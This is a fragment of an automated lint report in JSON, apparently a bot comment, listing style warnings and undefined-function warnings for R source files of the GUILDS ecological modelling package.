\n^~\n```\n[R/Condition.R:213:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L213) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"simplex\") {\n    ^\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L214) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:214:18:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:215:4:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L215) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:216:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"subplex\") {\n    ^\n```\n[R/Condition.R:217:7:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L217) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​\tx <- subplex(initVals, g)\n      ^~~~~~~\n```\n[R/Condition.R:217:11:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L217) *style:* **Put spaces around all infix operators.**\n```r\n​\tx <- subplex(initVals, g)\n         ~^~~\n```\n[R/Condition.R:217:22:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/Condition.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tx <- subplex(initVals, g)\n                     ^~~~~~~~\n```\n[R/drawLocal.R:1:23:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                      ^\n```\n[R/drawLocal.R:1:25:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                        ^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **lines should not be more than 80 characters.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n           ^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n          ~^~\n```\n[R/drawLocal.R:3:29:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                           ~^~\n```\n[R/drawLocal.R:3:43:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                         ~^~\n```\n[R/drawLocal.R:3:50:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                ~^\n```\n[R/drawLocal.R:3:57:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L3) *style:* **Commented code should be removed.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n           ^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n          ~^~\n```\n[R/drawLocal.R:4:25:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                        ^~~~~~~~\n```\n[R/drawLocal.R:4:36:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L4) *style:* **Commented code should be removed.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                                   ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n           ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk = k1[cnt];\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tk = k1[cnt];\n                  ^\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                     ^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                    ~^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                     ^\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                    ~^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:12:8:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax<(y0+1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = 0;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = 0;\n                             ^\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xL = f(1e-10);\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L19) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xL = f(1e-10);\n    ^~~~~~~~~~~~~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xR = f(xmax);\n^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:20:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L20) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xR = f(xmax);\n    ^~~~~~~~~~~~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n^~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L21) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n^~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                             ^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                            ~^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 = (xmax+1)/2;\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:20:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tx1 = (xmax+1)/2;\n                   ^\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:8:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:26:22:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L26) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n                     ^\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:28:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n                           ^\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:28:9:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n        ^~~~~~~~~\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                           ^\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/1ec370307bbc9cb8832e3dfb437bb96942f7c57e/R/drawLocal.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                          ~^~\n```\n"}},"created_at":"2016-09-22T08:51:37Z"}
